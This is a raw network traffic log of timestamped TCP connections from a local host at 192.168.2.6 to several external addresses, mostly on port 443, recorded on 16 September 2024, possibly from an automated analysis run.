Sep 16, 2024 21:20:34.884361029 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.884481907 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.884481907 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.884525061 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.885008097 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.885063887 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.933722019 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:35.334079027 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:35.334147930 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:35.334252119 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:35.334636927 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:35.334656954 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:35.852200031 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:35.854598045 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:35.854623079 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.098707914 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.098762989 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.098973036 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:36.098994017 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100205898 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100238085 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100271940 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:36.100282907 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100332022 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:36.100692034 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100811005 CEST	443	49734	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:36.100869894 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:36.101284027 CEST	49734	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:40.445400000 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:40.445465088 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:40.445549011 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:40.445879936 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:40.445904970 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:50.662961960 CEST	49703	80	192.168.2.6	172.64.149.23
Sep 16, 2024 21:20:50.662975073 CEST	49702	80	192.168.2.6	172.64.149.23
Sep 16, 2024 21:20:50.668311119 CEST	80	49703	172.64.149.23	192.168.2.6
Sep 16, 2024 21:20:50.668492079 CEST	49703	80	192.168.2.6	172.64.149.23
Sep 16, 2024 21:20:50.669193029 CEST	80	49702	172.64.149.23	192.168.2.6
Sep 16, 2024 21:20:50.669372082 CEST	49702	80	192.168.2.6	172.64.149.23
Sep 16, 2024 21:21:10.921333075 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:10.921356916 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:10.921529055 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:10.921596050 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:10.924949884 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:10.924971104 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.031847954 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.036880016 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:11.036971092 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.151328087 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.151355028 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.151458025 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:11.151498079 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.193933010 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:11.193952084 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.214441061 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:11.214569092 CEST	443	49735	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:11.214652061 CEST	49735	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:11.215059996 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.215162039 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.215260029 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.215559006 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.215595007 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.690809011 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.692718983 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.692790985 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.945401907 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.945862055 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.945903063 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.945934057 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.945957899 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.946012974 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.946660042 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947424889 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947470903 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947493076 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.947503090 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947547913 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.947556019 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947570086 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:11.947632074 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:11.955117941 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:16.226733923 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.226825953 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.226975918 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.227345943 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.227372885 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.683634996 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.685971022 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.686006069 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.822974920 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.823515892 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.823534012 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.823632002 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.823657036 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.823756933 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.824405909 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.825071096 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.825154066 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.825161934 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.825881958 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.825978994 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.825987101 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.829045057 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.829130888 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.829138041 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.881494045 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.910383940 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.910614967 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.910650015 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.910696983 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.910705090 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.910732985 CEST	443	49739	104.21.76.57	192.168.2.6
Sep 16, 2024 21:21:16.910876036 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:16.911851883 CEST	49739	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:21:17.023555040 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.023643970 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.023818970 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.024441957 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.024475098 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.486860037 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.487006903 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.488989115 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.489001036 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.489331961 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.491137981 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.531443119 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.620796919 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.620867968 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.620934010 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.620961905 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.621437073 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.621496916 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.621503115 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.621953011 CEST	443	49740	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:17.622008085 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.622008085 CEST	49740	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:17.728554964 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:17.728660107 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:17.728780031 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:17.729018927 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:17.729055882 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:18.793517113 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:18.795448065 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:18.795478106 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.024257898 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.024626970 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.024657011 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.024694920 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:19.024734974 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.024790049 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:19.025504112 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026211023 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026241064 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026274920 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:19.026289940 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026350975 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:19.026360989 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026376963 CEST	443	49741	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:19.026428938 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:19.026618958 CEST	49741	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:22.851680994 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:22.851727962 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:22.851818085 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:22.852134943 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:22.852149010 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:23.623249054 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:23.625300884 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:23.625372887 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.764749050 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765109062 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765130043 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765183926 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:24.765218973 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765294075 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:24.765769005 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765846014 CEST	443	49743	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:24.765898943 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:24.774975061 CEST	49743	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:25.024422884 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.024488926 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.024642944 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.024944067 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.024960041 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.523204088 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.525640965 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.525661945 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.755630016 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.755728006 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.755801916 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.755871058 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.755935907 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.756025076 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.756685972 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.757004976 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.757023096 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.757088900 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.757103920 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.757121086 CEST	443	49744	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:25.757180929 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.757262945 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:25.758109093 CEST	49744	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:30.148143053 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.148252010 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.148411036 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.148679018 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.148716927 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.609445095 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.611835003 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.611866951 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.730655909 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.730689049 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.730880022 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.730945110 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.731069088 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.731127977 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.731146097 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.731415033 CEST	443	49745	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:30.731478930 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:30.739712954 CEST	49745	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:31.301460028 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:31.301512003 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:31.301585913 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:31.301884890 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:31.301898003 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:31.762494087 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:31.764375925 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:31.764411926 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010014057 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010227919 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010284901 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:32.010303974 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010798931 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010864973 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:32.010870934 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.010957003 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.011009932 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:32.011014938 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.011198997 CEST	443	49746	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:32.011256933 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:32.011646986 CEST	49746	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:36.425030947 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:36.425075054 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:36.425147057 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:36.425370932 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:36.425381899 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:36.966732025 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:36.990087986 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:36.990104914 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.128212929 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.128345013 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.128406048 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:37.128443003 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.133202076 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.133311033 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:37.133320093 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.133339882 CEST	443	49747	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:37.133393049 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:37.141393900 CEST	49747	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:37.530066967 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:37.530179024 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:37.530263901 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:37.530486107 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:37.530508995 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.336795092 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.339366913 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.339418888 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.553725958 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.553864002 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.553947926 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.553992987 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.554022074 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.554078102 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.554111958 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.554990053 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.555066109 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.555067062 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.555092096 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.555145979 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.555177927 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.555308104 CEST	443	49748	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:38.555363894 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:38.555538893 CEST	49748	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:42.648935080 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:42.649054050 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:42.649152994 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:42.649465084 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:42.649504900 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.218318939 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.220196962 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:43.220259905 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.352653027 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.352777958 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.352897882 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.352916002 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:43.352967978 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.353239059 CEST	443	49749	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:43.353416920 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:43.409722090 CEST	49749	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:44.066695929 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.066756964 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.066962957 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.067368984 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.067393064 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.525526047 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.527694941 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.527709007 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.761800051 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.761928082 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762018919 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762051105 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.762064934 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762708902 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762799025 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762805939 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.762825966 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.762857914 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.763078928 CEST	443	49750	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:44.763700008 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:44.764027119 CEST	49750	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:49.222470999 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.222537994 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.222616911 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.223295927 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.223315001 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.702629089 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.710722923 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.710809946 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841418982 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841599941 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841658115 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841687918 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841691017 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.841739893 CEST	443	49751	104.20.4.235	192.168.2.6
